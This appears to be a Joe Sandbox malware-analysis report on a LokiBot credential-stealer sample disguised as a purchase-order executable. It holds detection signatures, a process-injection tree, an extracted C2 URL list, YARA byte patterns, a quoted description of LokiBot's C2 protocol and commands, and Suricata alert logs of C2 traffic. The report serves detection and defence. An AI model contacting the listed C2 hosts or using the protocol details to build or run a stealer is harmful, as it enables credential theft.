Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1e#U0414.exe

Overview

General Information

Sample name:1e#U0414.exe
renamed because original name is a hash value
Original sample name: _(PO_46338032)_-- .exe
Analysis ID:1518306
MD5:ed9fe2c20a68172921c064d0d9886b7b
SHA1:d892be8018cbc88b8cdd0db2338f643448630757
SHA256:bfcc16e302514e80fdc77675291f1bdb32796e7b77274f7596049938d0652347
Tags:exeuser-abuse_ch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Lokibot
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 1e#U0414.exe (PID: 6760 cmdline: "C:\Users\user\Desktop\1e#U0414.exe" MD5: ED9FE2C20A68172921C064D0D9886B7B)
    • aspnet_compiler.exe (PID: 6808 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • aspnet_compiler.exe (PID: 6880 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x17ef8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x52c3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 23 entries
          SourceRuleDescriptionAuthorStrings
          0.2.1e#U0414.exe.446ab08.1.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
            0.2.1e#U0414.exe.446ab08.1.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              0.2.1e#U0414.exe.446ab08.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.1e#U0414.exe.446ab08.1.raw.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                0.2.1e#U0414.exe.446ab08.1.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                Click to see the 32 entries

                System Summary

                barindex
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\1e#U0414.exe", ParentImage: C:\Users\user\Desktop\1e#U0414.exe, ParentProcessId: 6760, ParentProcessName: 1e#U0414.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 6808, ProcessName: aspnet_compiler.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T15:28:37.472266+020020243121A Network Trojan was detected192.168.2.449730188.114.96.380TCP
                2024-09-25T15:28:38.475893+020020243121A Network Trojan was detected192.168.2.449731188.114.96.380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T15:28:36.808752+020020253811Malware Command and Control Activity Detected192.168.2.449730188.114.96.380TCP
                2024-09-25T15:28:37.787248+020020253811Malware Command and Control Activity Detected192.168.2.449731188.114.96.380TCP
                2024-09-25T15:28:38.549981+020020253811Malware Command and Control Activity Detected192.168.2.449732188.114.96.380TCP
                2024-09-25T15:28:39.422340+020020253811Malware Command and Control Activity Detected192.168.2.449733188.114.96.380TCP
                2024-09-25T15:28:40.334278+020020253811Malware Command and Control Activity Detected192.168.2.449734188.114.96.380TCP
                2024-09-25T15:28:41.272883+020020253811Malware Command and Control Activity Detected192.168.2.449735188.114.96.380TCP
                2024-09-25T15:28:42.154915+020020253811Malware Command and Control Activity Detected192.168.2.449736188.114.96.380TCP
                2024-09-25T15:28:43.005872+020020253811Malware Command and Control Activity Detected192.168.2.449737188.114.96.380TCP
                2024-09-25T15:28:44.024460+020020253811Malware Command and Control Activity Detected192.168.2.449738188.114.96.380TCP
                2024-09-25T15:28:44.864953+020020253811Malware Command and Control Activity Detected192.168.2.449739188.114.96.380TCP
                2024-09-25T15:28:45.794467+020020253811Malware Command and Control Activity Detected192.168.2.449740188.114.96.380TCP
                2024-09-25T15:28:46.586604+020020253811Malware Command and Control Activity Detected192.168.2.449741188.114.96.380TCP
                2024-09-25T15:28:47.459806+020020253811Malware Command and Control Activity Detected192.168.2.449743188.114.96.380TCP
                2024-09-25T15:28:48.329147+020020253811Malware Command and Control Activity Detected192.168.2.449745188.114.96.380TCP
                2024-09-25T15:28:49.199142+020020253811Malware Command and Control Activity Detected192.168.2.449747188.114.96.380TCP
                2024-09-25T15:28:50.188831+020020253811Malware Command and Control Activity Detected192.168.2.449749188.114.96.380TCP
                2024-09-25T15:28:51.102415+020020253811Malware Command and Control Activity Detected192.168.2.455890188.114.96.380TCP
                2024-09-25T15:28:51.992772+020020253811Malware Command and Control Activity Detected192.168.2.455892188.114.96.380TCP
                2024-09-25T15:28:52.881678+020020253811Malware Command and Control Activity Detected192.168.2.455893188.114.96.380TCP
                2024-09-25T15:28:53.727656+020020253811Malware Command and Control Activity Detected192.168.2.455894188.114.96.380TCP
                2024-09-25T15:28:54.537764+020020253811Malware Command and Control Activity Detected192.168.2.455895188.114.96.380TCP
                2024-09-25T15:28:55.513579+020020253811Malware Command and Control Activity Detected192.168.2.455896188.114.96.380TCP
                2024-09-25T15:28:56.412404+020020253811Malware Command and Control Activity Detected192.168.2.455897188.114.96.380TCP
                2024-09-25T15:28:57.598723+020020253811Malware Command and Control Activity Detected192.168.2.455898188.114.96.380TCP
                2024-09-25T15:28:58.474678+020020253811Malware Command and Control Activity Detected192.168.2.455899188.114.96.380TCP
                2024-09-25T15:28:59.484196+020020253811Malware Command and Control Activity Detected192.168.2.455900188.114.96.380TCP
                2024-09-25T15:29:00.473536+020020253811Malware Command and Control Activity Detected192.168.2.455901188.114.96.380TCP
                2024-09-25T15:29:01.372433+020020253811Malware Command and Control Activity Detected192.168.2.455902188.114.96.380TCP
                2024-09-25T15:29:02.239881+020020253811Malware Command and Control Activity Detected192.168.2.455903188.114.96.380TCP
                2024-09-25T15:29:03.276280+020020253811Malware Command and Control Activity Detected192.168.2.455904188.114.96.380TCP
                2024-09-25T15:29:04.099861+020020253811Malware Command and Control Activity Detected192.168.2.455905188.114.96.380TCP
                2024-09-25T15:29:04.914672+020020253811Malware Command and Control Activity Detected192.168.2.455906188.114.96.380TCP
                2024-09-25T15:29:05.723093+020020253811Malware Command and Control Activity Detected192.168.2.455907188.114.96.380TCP
                2024-09-25T15:29:06.587971+020020253811Malware Command and Control Activity Detected192.168.2.455908188.114.96.380TCP
                2024-09-25T15:29:07.449997+020020253811Malware Command and Control Activity Detected192.168.2.455909188.114.96.380TCP
                2024-09-25T15:29:08.319578+020020253811Malware Command and Control Activity Detected192.168.2.455910188.114.96.380TCP
                2024-09-25T15:29:09.181026+020020253811Malware Command and Control Activity Detected192.168.2.455911188.114.96.380TCP
                2024-09-25T15:29:10.039622+020020253811Malware Command and Control Activity Detected192.168.2.455912188.114.96.380TCP
                2024-09-25T15:29:10.892410+020020253811Malware Command and Control Activity Detected192.168.2.455913188.114.96.380TCP
                2024-09-25T15:29:11.755447+020020253811Malware Command and Control Activity Detected192.168.2.455914188.114.96.380TCP
                2024-09-25T15:29:12.608011+020020253811Malware Command and Control Activity Detected192.168.2.455915188.114.96.380TCP
                2024-09-25T15:29:13.487014+020020253811Malware Command and Control Activity Detected192.168.2.455916188.114.96.380TCP
                2024-09-25T15:29:14.457362+020020253811Malware Command and Control Activity Detected192.168.2.455917188.114.96.380TCP
                2024-09-25T15:29:15.345683+020020253811Malware Command and Control Activity Detected192.168.2.455918188.114.96.380TCP
                2024-09-25T15:29:16.357807+020020253811Malware Command and Control Activity Detected192.168.2.455919188.114.96.380TCP
                2024-09-25T15:29:17.230322+020020253811Malware Command and Control Activity Detected192.168.2.455920188.114.96.380TCP
                2024-09-25T15:29:18.111648+020020253811Malware Command and Control Activity Detected192.168.2.455921188.114.96.380TCP
                2024-09-25T15:29:18.948583+020020253811Malware Command and Control Activity Detected192.168.2.455922188.114.96.380TCP
                2024-09-25T15:29:19.785848+020020253811Malware Command and Control Activity Detected192.168.2.455923188.114.96.380TCP
                2024-09-25T15:29:20.658125+020020253811Malware Command and Control Activity Detected192.168.2.455924188.114.96.380TCP
                2024-09-25T15:29:21.877333+020020253811Malware Command and Control Activity Detected192.168.2.455925188.114.96.380TCP
                2024-09-25T15:29:22.966391+020020253811Malware Command and Control Activity Detected192.168.2.455926188.114.96.380TCP
                2024-09-25T15:29:23.928498+020020253811Malware Command and Control Activity Detected192.168.2.455927188.114.96.380TCP
                2024-09-25T15:29:24.921645+020020253811Malware Command and Control Activity Detected192.168.2.455928188.114.96.380TCP
                2024-09-25T15:29:27.055675+020020253811Malware Command and Control Activity Detected192.168.2.455929188.114.96.380TCP
                2024-09-25T15:29:27.870221+020020253811Malware Command and Control Activity Detected192.168.2.455931188.114.96.380TCP
                2024-09-25T15:29:28.942773+020020253811Malware Command and Control Activity Detected192.168.2.455932188.114.96.380TCP
                2024-09-25T15:29:29.777253+020020253811Malware Command and Control Activity Detected192.168.2.455933188.114.96.380TCP
                2024-09-25T15:29:30.591674+020020253811Malware Command and Control Activity Detected192.168.2.455934188.114.96.380TCP
                2024-09-25T15:29:31.906770+020020253811Malware Command and Control Activity Detected192.168.2.455935188.114.96.380TCP
                2024-09-25T15:29:32.797954+020020253811Malware Command and Control Activity Detected192.168.2.455936188.114.96.380TCP
                2024-09-25T15:29:33.663752+020020253811Malware Command and Control Activity Detected192.168.2.455937188.114.96.380TCP
                2024-09-25T15:29:34.519787+020020253811Malware Command and Control Activity Detected192.168.2.455938188.114.96.380TCP
                2024-09-25T15:29:35.353459+020020253811Malware Command and Control Activity Detected192.168.2.455939188.114.96.380TCP
                2024-09-25T15:29:36.192350+020020253811Malware Command and Control Activity Detected192.168.2.455940188.114.96.380TCP
                2024-09-25T15:29:37.117852+020020253811Malware Command and Control Activity Detected192.168.2.455941188.114.96.380TCP
                2024-09-25T15:29:38.099928+020020253811Malware Command and Control Activity Detected192.168.2.455942188.114.96.380TCP
                2024-09-25T15:29:39.059740+020020253811Malware Command and Control Activity Detected192.168.2.455943188.114.96.380TCP
                2024-09-25T15:29:39.928784+020020253811Malware Command and Control Activity Detected192.168.2.455944188.114.96.380TCP
                2024-09-25T15:29:40.808147+020020253811Malware Command and Control Activity Detected192.168.2.455945188.114.96.380TCP
                2024-09-25T15:29:41.638243+020020253811Malware Command and Control Activity Detected192.168.2.455946188.114.96.380TCP
                2024-09-25T15:29:42.475611+020020253811Malware Command and Control Activity Detected192.168.2.455947188.114.96.380TCP
                2024-09-25T15:29:43.324953+020020253811Malware Command and Control Activity Detected192.168.2.455948188.114.96.380TCP
                2024-09-25T15:29:44.263622+020020253811Malware Command and Control Activity Detected192.168.2.455949188.114.96.380TCP
                2024-09-25T15:29:45.374185+020020253811Malware Command and Control Activity Detected192.168.2.455950188.114.96.380TCP
                2024-09-25T15:29:46.306365+020020253811Malware Command and Control Activity Detected192.168.2.455951188.114.96.380TCP
                2024-09-25T15:29:47.360807+020020253811Malware Command and Control Activity Detected192.168.2.455952188.114.96.380TCP
                2024-09-25T15:29:48.414802+020020253811Malware Command and Control Activity Detected192.168.2.455953188.114.96.380TCP
                2024-09-25T15:29:49.677411+020020253811Malware Command and Control Activity Detected192.168.2.455954188.114.96.380TCP
                2024-09-25T15:29:50.524174+020020253811Malware Command and Control Activity Detected192.168.2.455955188.114.96.380TCP
                2024-09-25T15:29:51.428232+020020253811Malware Command and Control Activity Detected192.168.2.455956188.114.96.380TCP
                2024-09-25T15:29:52.541643+020020253811Malware Command and Control Activity Detected192.168.2.455957188.114.96.380TCP
                2024-09-25T15:29:53.383135+020020253811Malware Command and Control Activity Detected192.168.2.455958188.114.96.380TCP
                2024-09-25T15:29:54.258505+020020253811Malware Command and Control Activity Detected192.168.2.455959188.114.96.380TCP
                2024-09-25T15:29:55.425796+020020253811Malware Command and Control Activity Detected192.168.2.455960188.114.96.380TCP
                2024-09-25T15:29:56.224619+020020253811Malware Command and Control Activity Detected192.168.2.455961188.114.96.380TCP
                2024-09-25T15:29:57.052272+020020253811Malware Command and Control Activity Detected192.168.2.455962188.114.96.380TCP
                2024-09-25T15:29:58.164945+020020253811Malware Command and Control Activity Detected192.168.2.455963188.114.96.380TCP
                2024-09-25T15:29:58.987927+020020253811Malware Command and Control Activity Detected192.168.2.455964188.114.96.380TCP
                2024-09-25T15:29:59.835835+020020253811Malware Command and Control Activity Detected192.168.2.455965188.114.96.380TCP
                2024-09-25T15:30:00.716018+020020253811Malware Command and Control Activity Detected192.168.2.455966188.114.96.380TCP
                2024-09-25T15:30:01.920768+020020253811Malware Command and Control Activity Detected192.168.2.455967188.114.96.380TCP
                2024-09-25T15:30:02.761283+020020253811Malware Command and Control Activity Detected192.168.2.455968188.114.96.380TCP
                2024-09-25T15:30:03.946516+020020253811Malware Command and Control Activity Detected192.168.2.455969188.114.96.380TCP
                2024-09-25T15:30:05.226430+020020253811Malware Command and Control Activity Detected192.168.2.455970188.114.96.380TCP
                2024-09-25T15:30:06.440249+020020253811Malware Command and Control Activity Detected192.168.2.455971188.114.96.380TCP
                2024-09-25T15:30:07.613698+020020253811Malware Command and Control Activity Detected192.168.2.455972188.114.96.380TCP
                2024-09-25T15:30:08.520224+020020253811Malware Command and Control Activity Detected192.168.2.455973188.114.96.380TCP
                2024-09-25T15:30:09.339418+020020253811Malware Command and Control Activity Detected192.168.2.455974188.114.96.380TCP
                2024-09-25T15:30:10.220925+020020253811Malware Command and Control Activity Detected192.168.2.455975188.114.96.380TCP
                2024-09-25T15:30:11.026164+020020253811Malware Command and Control Activity Detected192.168.2.455976188.114.96.380TCP
                2024-09-25T15:30:12.218161+020020253811Malware Command and Control Activity Detected192.168.2.455977188.114.96.380TCP
                2024-09-25T15:30:13.173782+020020253811Malware Command and Control Activity Detected192.168.2.455978188.114.96.380TCP
                2024-09-25T15:30:13.993423+020020253811Malware Command and Control Activity Detected192.168.2.455979188.114.96.380TCP
                2024-09-25T15:30:14.842547+020020253811Malware Command and Control Activity Detected192.168.2.455980188.114.96.380TCP
                2024-09-25T15:30:15.691270+020020253811Malware Command and Control Activity Detected192.168.2.455981188.114.96.380TCP
                2024-09-25T15:30:16.551798+020020253811Malware Command and Control Activity Detected192.168.2.455982188.114.96.380TCP
                2024-09-25T15:30:17.497860+020020253811Malware Command and Control Activity Detected192.168.2.455983188.114.96.380TCP
                2024-09-25T15:30:18.363198+020020253811Malware Command and Control Activity Detected192.168.2.455984188.114.96.380TCP
                2024-09-25T15:30:19.199856+020020253811Malware Command and Control Activity Detected192.168.2.455985188.114.96.380TCP
                2024-09-25T15:30:20.095708+020020253811Malware Command and Control Activity Detected192.168.2.455986188.114.96.380TCP
                2024-09-25T15:30:21.507011+020020253811Malware Command and Control Activity Detected192.168.2.455987188.114.96.380TCP
                2024-09-25T15:30:23.134473+020020253811Malware Command and Control Activity Detected192.168.2.455988188.114.96.380TCP
                2024-09-25T15:30:24.350366+020020253811Malware Command and Control Activity Detected192.168.2.455989188.114.96.380TCP
                2024-09-25T15:30:25.290428+020020253811Malware Command and Control Activity Detected192.168.2.455990188.114.96.380TCP
                2024-09-25T15:30:26.169979+020020253811Malware Command and Control Activity Detected192.168.2.455991188.114.96.380TCP
                2024-09-25T15:30:27.001129+020020253811Malware Command and Control Activity Detected192.168.2.455992188.114.96.380TCP
                2024-09-25T15:30:27.899264+020020253811Malware Command and Control Activity Detected192.168.2.455993188.114.96.380TCP
                2024-09-25T15:30:28.753857+020020253811Malware Command and Control Activity Detected192.168.2.455994188.114.96.380TCP
                2024-09-25T15:30:29.618078+020020253811Malware Command and Control Activity Detected192.168.2.455995188.114.96.380TCP
                2024-09-25T15:30:30.428677+020020253811Malware Command and Control Activity Detected192.168.2.455996188.114.96.380TCP
                2024-09-25T15:30:31.273028+020020253811Malware Command and Control Activity Detected192.168.2.455997188.114.96.380TCP
                2024-09-25T15:30:32.135559+020020253811Malware Command and Control Activity Detected192.168.2.455998188.114.96.380TCP
                2024-09-25T15:30:33.256022+020020253811Malware Command and Control Activity Detected192.168.2.455999188.114.96.380TCP
                2024-09-25T15:30:34.073488+020020253811Malware Command and Control Activity Detected192.168.2.456000188.114.96.380TCP
                2024-09-25T15:30:35.801198+020020253811Malware Command and Control Activity Detected192.168.2.456001188.114.96.380TCP
                2024-09-25T15:30:37.771542+020020253811Malware Command and Control Activity Detected192.168.2.456002188.114.96.380TCP
                2024-09-25T15:30:38.713862+020020253811Malware Command and Control Activity Detected192.168.2.456003188.114.96.380TCP
                2024-09-25T15:30:39.594556+020020253811Malware Command and Control Activity Detected192.168.2.456004188.114.96.380TCP
                2024-09-25T15:30:40.433961+020020253811Malware Command and Control Activity Detected192.168.2.456005188.114.96.380TCP
                2024-09-25T15:30:41.413983+020020253811Malware Command and Control Activity Detected192.168.2.456006188.114.96.380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T15:28:34.491221+020020254831A Network Trojan was detected188.114.96.380192.168.2.456006TCP
                2024-09-25T15:28:39.246004+020020254831A Network Trojan was detected188.114.96.380192.168.2.449732TCP
                2024-09-25T15:28:40.181088+020020254831A Network Trojan was detected188.114.96.380192.168.2.449733TCP
                2024-09-25T15:28:41.118035+020020254831A Network Trojan was detected188.114.96.380192.168.2.449734TCP
                2024-09-25T15:28:41.995245+020020254831A Network Trojan was detected188.114.96.380192.168.2.449735TCP
                2024-09-25T15:28:42.850104+020020254831A Network Trojan was detected188.114.96.380192.168.2.449736TCP
                2024-09-25T15:28:43.875473+020020254831A Network Trojan was detected188.114.96.380192.168.2.449737TCP
                2024-09-25T15:28:44.712136+020020254831A Network Trojan was detected188.114.96.380192.168.2.449738TCP
                2024-09-25T15:28:45.631218+020020254831A Network Trojan was detected188.114.96.380192.168.2.449739TCP
                2024-09-25T15:28:46.440257+020020254831A Network Trojan was detected188.114.96.380192.168.2.449740TCP
                2024-09-25T15:28:47.278219+020020254831A Network Trojan was detected188.114.96.380192.168.2.449741TCP
                2024-09-25T15:28:48.165787+020020254831A Network Trojan was detected188.114.96.380192.168.2.449743TCP
                2024-09-25T15:28:49.044212+020020254831A Network Trojan was detected188.114.96.380192.168.2.449745TCP
                2024-09-25T15:28:49.983395+020020254831A Network Trojan was detected188.114.96.380192.168.2.449747TCP
                2024-09-25T15:28:50.956867+020020254831A Network Trojan was detected188.114.96.380192.168.2.449749TCP
                2024-09-25T15:28:51.835887+020020254831A Network Trojan was detected188.114.96.380192.168.2.455890TCP
                2024-09-25T15:28:52.736496+020020254831A Network Trojan was detected188.114.96.380192.168.2.455892TCP
                2024-09-25T15:28:53.555610+020020254831A Network Trojan was detected188.114.96.380192.168.2.455893TCP
                2024-09-25T15:28:54.384675+020020254831A Network Trojan was detected188.114.96.380192.168.2.455894TCP
                2024-09-25T15:28:55.235087+020020254831A Network Trojan was detected188.114.96.380192.168.2.455895TCP
                2024-09-25T15:28:56.268225+020020254831A Network Trojan was detected188.114.96.380192.168.2.455896TCP
                2024-09-25T15:28:57.196981+020020254831A Network Trojan was detected188.114.96.380192.168.2.455897TCP
                2024-09-25T15:28:58.326273+020020254831A Network Trojan was detected188.114.96.380192.168.2.455898TCP
                2024-09-25T15:28:59.176151+020020254831A Network Trojan was detected188.114.96.380192.168.2.455899TCP
                2024-09-25T15:29:00.305746+020020254831A Network Trojan was detected188.114.96.380192.168.2.455900TCP
                2024-09-25T15:29:01.207280+020020254831A Network Trojan was detected188.114.96.380192.168.2.455901TCP
                2024-09-25T15:29:02.090433+020020254831A Network Trojan was detected188.114.96.380192.168.2.455902TCP
                2024-09-25T15:29:03.028345+020020254831A Network Trojan was detected188.114.96.380192.168.2.455903TCP
                2024-09-25T15:29:03.941766+020020254831A Network Trojan was detected188.114.96.380192.168.2.455904TCP
                2024-09-25T15:29:04.762456+020020254831A Network Trojan was detected188.114.96.380192.168.2.455905TCP
                2024-09-25T15:29:05.579762+020020254831A Network Trojan was detected188.114.96.380192.168.2.455906TCP
                2024-09-25T15:29:06.431327+020020254831A Network Trojan was detected188.114.96.380192.168.2.455907TCP
                2024-09-25T15:29:07.275362+020020254831A Network Trojan was detected188.114.96.380192.168.2.455908TCP
                2024-09-25T15:29:08.160820+020020254831A Network Trojan was detected188.114.96.380192.168.2.455909TCP
                2024-09-25T15:29:09.008486+020020254831A Network Trojan was detected188.114.96.380192.168.2.455910TCP
                2024-09-25T15:29:09.877822+020020254831A Network Trojan was detected188.114.96.380192.168.2.455911TCP
                2024-09-25T15:29:10.733142+020020254831A Network Trojan was detected188.114.96.380192.168.2.455912TCP
                2024-09-25T15:29:11.588290+020020254831A Network Trojan was detected188.114.96.380192.168.2.455913TCP
                2024-09-25T15:29:12.450993+020020254831A Network Trojan was detected188.114.96.380192.168.2.455914TCP
                2024-09-25T15:29:13.333492+020020254831A Network Trojan was detected188.114.96.380192.168.2.455915TCP
                2024-09-25T15:29:14.289431+020020254831A Network Trojan was detected188.114.96.380192.168.2.455916TCP
                2024-09-25T15:29:15.172021+020020254831A Network Trojan was detected188.114.96.380192.168.2.455917TCP
                2024-09-25T15:29:16.087444+020020254831A Network Trojan was detected188.114.96.380192.168.2.455918TCP
                2024-09-25T15:29:17.074546+020020254831A Network Trojan was detected188.114.96.380192.168.2.455919TCP
                2024-09-25T15:29:17.932139+020020254831A Network Trojan was detected188.114.96.380192.168.2.455920TCP
                2024-09-25T15:29:18.786816+020020254831A Network Trojan was detected188.114.96.380192.168.2.455921TCP
                2024-09-25T15:29:19.614844+020020254831A Network Trojan was detected188.114.96.380192.168.2.455922TCP
                2024-09-25T15:29:20.501107+020020254831A Network Trojan was detected188.114.96.380192.168.2.455923TCP
                2024-09-25T15:29:21.691492+020020254831A Network Trojan was detected188.114.96.380192.168.2.455924TCP
                2024-09-25T15:29:22.680605+020020254831A Network Trojan was detected188.114.96.380192.168.2.455925TCP
                2024-09-25T15:29:23.758949+020020254831A Network Trojan was detected188.114.96.380192.168.2.455926TCP
                2024-09-25T15:29:24.760805+020020254831A Network Trojan was detected188.114.96.380192.168.2.455927TCP
                2024-09-25T15:29:26.883421+020020254831A Network Trojan was detected188.114.96.380192.168.2.455928TCP
                2024-09-25T15:29:27.715578+020020254831A Network Trojan was detected188.114.96.380192.168.2.455929TCP
                2024-09-25T15:29:28.631311+020020254831A Network Trojan was detected188.114.96.380192.168.2.455931TCP
                2024-09-25T15:29:29.620789+020020254831A Network Trojan was detected188.114.96.380192.168.2.455932TCP
                2024-09-25T15:29:30.436181+020020254831A Network Trojan was detected188.114.96.380192.168.2.455933TCP
                2024-09-25T15:29:31.579554+020020254831A Network Trojan was detected188.114.96.380192.168.2.455934TCP
                2024-09-25T15:29:32.628954+020020254831A Network Trojan was detected188.114.96.380192.168.2.455935TCP
                2024-09-25T15:29:33.513537+020020254831A Network Trojan was detected188.114.96.380192.168.2.455936TCP
                2024-09-25T15:29:34.373954+020020254831A Network Trojan was detected188.114.96.380192.168.2.455937TCP
                2024-09-25T15:29:35.198670+020020254831A Network Trojan was detected188.114.96.380192.168.2.455938TCP
                2024-09-25T15:29:36.047855+020020254831A Network Trojan was detected188.114.96.380192.168.2.455939TCP
                2024-09-25T15:29:36.935469+020020254831A Network Trojan was detected188.114.96.380192.168.2.455940TCP
